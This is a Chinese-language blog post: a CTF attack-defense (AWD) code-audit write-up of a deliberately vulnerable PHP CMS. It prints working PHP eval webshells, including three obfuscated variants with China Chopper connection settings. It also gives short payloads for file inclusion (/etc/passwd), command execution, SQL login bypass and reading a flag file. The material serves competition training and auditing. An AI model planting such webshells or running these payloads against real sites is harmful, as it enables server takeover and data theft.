CTF AWD模式下简单的CMS代码审计

最新推荐文章于 2024-04-07 01:39:56 发布
最新推荐文章于 2024-04-07 01:39:56 发布
阅读量3.3k 收藏 32
点赞数 4
分类专栏: CTF 文章标签: AWD 审计 PHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43442524/article/details/102409351
版权

ctf线下AWD攻防赛学习笔记:https://blog.csdn.net/qq_43442524/article/details/102653414
CTF线下AWD攻防步骤总结:https://blog.csdn.net/qq_43442524/article/details/102652029

今天先把去年的AWD代码审计一下,以后有时间就把今年的AWD代码审计写一下

index.php

<?php 
include 'header.php';
@eval($_REQUEST['aa']);
echo 'eval';
?>

首先打开index.php,一目了然,可以看到头文件有一句话木马,密码是aa

这里使用中国菜刀可以直接连上一句话木马,进入服务器

扩展

了解一句话脚本的工作原理
一句话脚本的工作原理:

一句话恶意脚本分析服务端与客户端。(此处以php脚本语言简述原理)

一句话恶意脚本服务端就是我们要用来插入到php文件中的asp语句,(不仅仅是以php为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为@eval($_REQUEST[‘aa’]); 其中aa可以自己修改

一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据的,提交的数据通过服务端构成完整的php功能语句并执行.

中国菜刀的请求方式为post。

一句话脚本的变形
案例1

加密类变形

php一句话恶意脚本带404页面,带MD5加密,可浏览器POST任意php代码执行. 代码如下:

<?php 
echo "404 Not Found!</br>"; error_reporting(0);
if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content));
echo "We're sorry but the page your are looking for is Not Found..."
?>

在菜刀里写http://xx.xx.xx.xx/test.php

密码:page

菜刀配置填:

<O>com=settoken&content=ZXZhbCgkX1BPU1RbJ3BhZ2UnXSk7</O>

案例2 变量拼接类变形

webshell的代码如下:

<?php 
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];if(isset($s22)){eval($s21($s22));}
?>

在菜刀里写http://xx.xx.xx.xx/test.php

密码是:0

菜刀配置填:

<O>n985de9=QGV2YWwoJF9QT1NUWzBdKTs=</O>

案例3 加密拼接类变形

webshell的代码如下:

<?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

在菜刀里写http://xx.xx.xx.xx/test.php

连接密码:1

about.php

可以看到这里打开了 allow_url_include 并且代码中有明显的文件包含漏洞

payload为?file=/etc/passwd

具体的文件包含漏洞可以查看这篇文章

services.php

这里我们点击第三个选项服务,点击以后页面正常 这里我们去查看一下它的源码

发现有异常,这里是一个简单的命令执行漏洞

payload:?shell=ls

contact.php

查看源码:

可以发现这里也是一个文件包含漏洞,不过相比上面那个有些复杂

payload:?path=/etc/passwd

爆出passwd文件

footer.php

返回主页 发现页面底端有异常

这里有简单的命令执行漏洞

注释即可

admin页面

在登陆界面

login.php

简单的sql注入

payload:admin ' #

header.php

这里是一个php命令执行漏洞

payload: ?p=cat /flag.txt

好了,代码就差不多就审计到这里了,一些简单的后门漏洞等用D盾或审计工具可以找出来,要想提高自己的话尽量花点时间,自主审计

普通Gopher
关注
  • 4
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
寒假AWD训练之初学代码审计
qq_42728977的博客
01-17 1233
寒假在家,老师组织了AWD训练赛,还是实战出真知,感觉比赛的学习效率是真的高。做个小总结。 也是刚入门,欢迎大佬斧正。 漏洞1:webshell.php 第一个漏洞是后门的,是一句话木马。 <?php @eval($_POST['moxiaoxi']) ?> 很简单,没有什么难度,可以直接菜刀,但是菜刀不能批量自动化获取flag。所以,尝试着写脚本。 import requests ...
Seay源代码审计系统(AWD必备)
07-09
Seay源代码审计系统 这是一款基于C#语言开发的一款针对PHP代码安全性审计的系统,主要运行于Windows系统上。这款软件能够发现SQL注入、代码执行、命令执行、文件包含、文件上传、绕过转义防护、拒绝服务、XSS跨站、信息泄露、任意URL跳转等漏洞,基本上覆盖常见PHP漏洞。另外,在功能上,它支持一键审计、代码调试、函数定位、插件扩展、自定义规则配置、代码高亮、编码调试转换、数据库执行监控等数十项强大功能。
渗透学习-23- WEB 攻防-Python 考点&amp;CTFCMS-SSTI 模版注入&amp;PYC 反编译
最新发布
m0_60666841的博客
04-07 848
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
网络攻防比赛平台源码(AWD-platform源码).7z
06-19
一个awd攻防比赛的裁判平台。 版本:beta v2.0 开发语言:python3 + django 平台分为两个部分 裁判机 靶机 通过特定接口,来实现靶机flag与服务器的通信 搭建流程 裁判机 安装所需环境 裁判机:python3+django 全局搜索woshiguanliyuan,并修改为随机字符串,此处为管理平台地址 /untitled/urls.py path('woshiguanliyuan/',views.admin,name='admin'), path('woshiguanliyuan/table/',views.admin_table,name='admin_table'), /app/views.py if 'woshiguanliyuan' not in request.META['HTTP_REFERER']: 第31和47换为你的目录 列:("/var/www/awd_platform/app/qwe.txt","a") 修改app/management/commands/init.py,添加用户 #['用户名','用户靶机token','用户靶机token'] user=[ ['123456','FF9C92C7SDFABB71566F73422C','FF9C92C7SDFABB71566F73422C'], ['aaabbb','311F8A54SV9K6B5FF4EAB20536','311F8A54SV9K6B5FF4EAB20536'] ] 修改/app/views.py第行d89f33b18ba2a74cd38499e587cb9dcd为靶机中设置的admin_token值的md5 if('d89f33b18ba2a74cd38499e587cb9dcd'==hl.hexdigest()): 运行 python3 manage.py init python3 manage.py manage.py runserver --insecure 靶机 安装所需环境 靶机:python+requests 修改send_flag.py参数,并将其放入靶机,设权限700。 靶机 sudo python send_flag.py。 靶机生成flag脚本,send_flag.py import requests import time import random import string import hashlib token='woshiwuxudong' # 红队 baji='311F8A54SV9K6B5FF4EAB20536' def getFlag(): #return ''.join(random.sample(string.ascii_letters + string.digits, 48)) m = hashlib.md5(''.join(random.sample(string.ascii_letters + string.digits, 48)).encode(encoding="utf-8")).hexdigest() return m while(1): f=open('/flag','w') flag=getFlag() f.write(flag) data={ 'flag':flag, 'token':token, 'baji':baji, } r=requests.post('http://127.0.0.1/caipanflag/',data=data) print(r.text) f.close() time.sleep(300) 重要须知 更新作者基础上: 1.增加flag验证一次性失效性,使得每个用户都并且仅可以提交一次flag 2.增加排名情况 3.flag改为MD5 4.增加丢失flag一轮扣100分
探索未来的内容管理系统:Dreamer CMS
gitblog_00081的博客
04-05 361
探索未来的内容管理系统:Dreamer CMS 项目地址:https://gitcode.com/iteachyou-wjn/dreamer_cms 项目简介 Dreamer CMS 是一个现代化、开源且高度可定制的内容管理系统,旨在提供简单易用的界面和强大的后台功能,以满足各种网站开发需求。它的设计哲学是让内容创建者专注于创作,而将复杂的管理任务交给系统处理。 技术分析 基于Node.js与V...
Dreamer CMS部署手册增加docker部署.docx
05-18
基于开源框架dreamer-cms 的linux服务器部署方案
CTF--CMS漏洞总结
热门推荐
woshisz0413的博客
11-27 1万+
CMS漏洞总结 CMS类型题目: 首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入; 或者上传一句话木马后使用菜刀连接,可能再连接数据库。 (1)CMSEASY类型 可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy 1.cmseasy 无限制报错注入 步骤:向http://*****/cel...
CTF AWD工具
10-07
首先,"Seay源代码审计系统.exe" 是一款源代码审计工具,用于检查Web应用的潜在安全漏洞。通过静态分析,它可以发现如SQL注入、XSS跨站脚本、文件包含漏洞等常见问题。该工具对于开发者和安全研究人员来说,是一个...
CTF工具之seay源代码审计系统(web).rar
09-16
CTF工具之seay源代码审计系统(web)】是一个专门为网络安全竞赛(CTF,Capture The Flag)设计的源代码审计工具,主要用于Web安全领域。这个工具的主要目的是帮助参赛者或者安全研究人员检测和分析Web应用程序中...
CTF线下AWD脚本合集.zip
03-31
AWD模式CTF比赛中是一种常见的竞赛形式,参赛队伍需要同时进行攻击和防守,攻击对手的系统以获取“旗子”(即关键信息),同时也要保护自己的系统不被对手攻破。这种模式对参赛者的攻防技能有较高要求,而这个合集...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入了解Web安全的各个方面,包括但不限于以下知识点: 1. **SQL注入**:参赛者需要...
CTF AWD比赛工具收集.zip
09-30
比赛项目源码
各种awd工具,工具集合
10-21
awd各种工具 代码审计 流量监控 远程连接 ,端口扫描等各种工具 和一个收集的awd资料集合
CTFAWD的waf 用于防止别人读取flag
10-08
CTFAWD的waf 用于防止别人读取flag 。 PHP版本,经过AWD实战。 可用于各种环境下的CTF线下赛
CTF学习(二)
qq_52696970的博客
08-21 720
CTF学习(二)Web站点信息收集1.CMS指纹识别2.针对CMS漏洞查询3.敏感目录信息4、wordpress测试端口信息收集1.端口介绍2.端口信息收集3.端口攻击4.防御措施 Web站点信息收集 1.CMS指纹识别 CMS(内容管理系统):整站系统或文章系统。用于网站内容管理。用户只需要下载对应的CMS软件包,部署搭建,就可以直接利用CMS简单方便。但是各种CMS都具有其独特的结构命名规则和特定的文件内容,因此可以利用这些内容来获取CMS站点的具体软件CMS与版本。 常见CMS: dedecms(织
ctf线下AWD攻防赛学习笔记
普通Gopher
10-20 1万+
ctf线下AWD攻防赛学习笔记 CTF线下攻防赛主要以攻防模式(Attack & Defense)来呈现。一般在这种模式下,一支参赛队伍有三名队员,所有的参赛队伍都会有同样的初始环境,包含若干台服务器。参赛队伍挖掘漏洞,通过攻击对手的服务器获取Flag来得分,以修补自身服务器的漏洞防止扣分。 在这种赛制中,不仅仅是比参赛队员的智力和技术,同时也比团队之间的分工配合与合作。 题目类型 语...
国赛分区赛awd赛后总结-安心做awd混子
Love&Share
06-30 9020
转载于安全客我自己发的哈~,感兴趣可以点链接进 https://www.anquanke.com/post/id/245158 安全客 - 有思想的安全新媒体 最近参加了国赛分区赛,我所在的分区正好是awd赛制,所以总结了下关于awd的基操,方便新手入门 简单来说就是三步 登录平台,查看规则,探索flag提交方式,比赛开始前有时间的话使用nmap或者httpscan等工具扫一下IP段,整理各队的IP(靶机的IP应该是比赛开始后才会给出) 登录ssh->dump源码->D盾去后门->一人写
线下AWD平台搭建以及一些相关问题解决
weixin_34211761的博客
05-15 2343
线下AWD平台搭建以及一些相关问题解决 一.前言   文章首发于tools,因为发现了一些新问题但是没法改,所以在博客进行补充。   因为很多人可能没有机会参加线下的AWD比赛,导致缺乏这方面经验,比如我参加过五次线下AWD攻防,虽然看过许多网上的AWD打发套路,但终究都是纸上谈兵,所以前几次都是被吊锤,一来不熟悉环境,二来有点手忙脚乱,其实根本原因就是缺乏经验,因此最近翻了翻G...
ctf 代码审计题目
10-21
其中,代码审计题目是CTF比赛中的一种常见类型,要求参赛者对给定的代码进行分析和审计,找出其中的漏洞并进行利用,最终获取flag(标志性字符串)。 在代码审计题目中,参赛者需要对给定的代码进行仔细的分析,找...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值